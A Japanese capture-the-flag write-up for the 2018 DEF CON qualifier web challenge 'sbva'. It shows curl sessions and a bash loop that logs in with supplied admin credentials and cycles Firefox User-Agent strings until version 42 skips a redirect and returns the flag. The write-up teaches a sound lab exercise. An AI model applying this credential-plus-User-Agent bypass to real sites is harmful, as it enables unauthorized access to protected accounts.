問題文

We offer extensive website protection that stops attackers even when the admin's credentials are leaked!
Try our demo page http://0da57cd5.quals2018.oooverflow.io with username:password admin@oooverflow.io:admin to see for yourself.

writeup

ログイン画面でadmin@oooverflow.io:adminを入力してログインすると、

Incompatible browser detected.

の表示。
http://0da57cd5.quals2018.oooverflow.io/wrongbrowser.phpへリダイレクトさせられる。

他に何が起きているか確認するため、curlで見てみる。

ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v
*   Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> User-Agent: curl/7.57.0
> Accept: */*
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 302 Found
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sat, 12 May 2018 11:11:52 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=luj4oovknmmia6boqqbd7bkde3; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< Location: wrongbrowser.php
< 

<html>
    <style scoped>
        h1 {color:red;}
        p {color:blue;} 
    </style>
    <video id="v" autoplay> </video>
    <script>
        if (navigator.battery.charging) {
            console.log("Device is charging.")
        }
    </script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>

HTTPレスポンスヘッダーのLocationヘッダーにwrongbrowser.phpがセットされているため、 画面表示されずにwrongbrowser.phpへリダイレクトされるのだが、HTTPレスポンスボディにコンテンツがあった。
これは怪しい。また、コンテンツにはあまり目にしないタグとプロパティがあることに気づく。

• style scoped
  <style>: The Style Information element - HTML | MDN
  Chromeは19-35の間だけサポート。
  FireFoxは21からサポート。

• navigator.battery.charging
  Navigator.battery - Web APIs | MDN
  Chromeは38からサポート。(ただ、自分のChrome66では使用できなかった。)
  FireFoxは50でサポート打ち切り([3] Removed in Firefox 50, in favor of navigator.getBattery().)

これらの機能を使用できるブラウザのUserAgentをHTTPリクエストヘッダーにセットすればいいのだろうか。
Gecko ユーザエージェント文字列リファレンス - HTTP | MDN より、FirefoxのUserAgent仕様を確認する。
UserAgentのバージョン番号を21から50の間で変化させて総当たりする。

ctfuser@kali:sbva$ cat try_FF.sh 
#!/bin/bash
for VER in `seq 21 50`
do
UA="Mozilla/5.0 (Windows NT 6.1; rv:$VER.0) Gecko/20100101 Firefox/$VER.0"
echo $UA
curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: $UA" 2>&1 | grep wrongbrowser.php
done

ctfuser@kali:sbva$ ./try_FF.sh 
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
< Location: wrongbrowser.php

Firefox/42だけ、Location: wrongbrowser.phpが返ってこない。
curlで単独実行してみると、フラグが返ってきていた。

ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"
*   Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sun, 13 May 2018 06:12:36 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=2kocc3ljm9njjsoediqasm6af6; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT[f:id:graneed:20180513154645p:plain]
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< 
OOO{0ld@dm1nbr0wser1sth30nlyw@y}
<html>
    <style scoped>
        h1 {color:red;}
        p {color:blue;} 
    </style>
    <video id="v" autoplay> </video>
    <script>
        if (navigator.battery.charging) {
            console.log("Device is charging.")
        }
    </script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>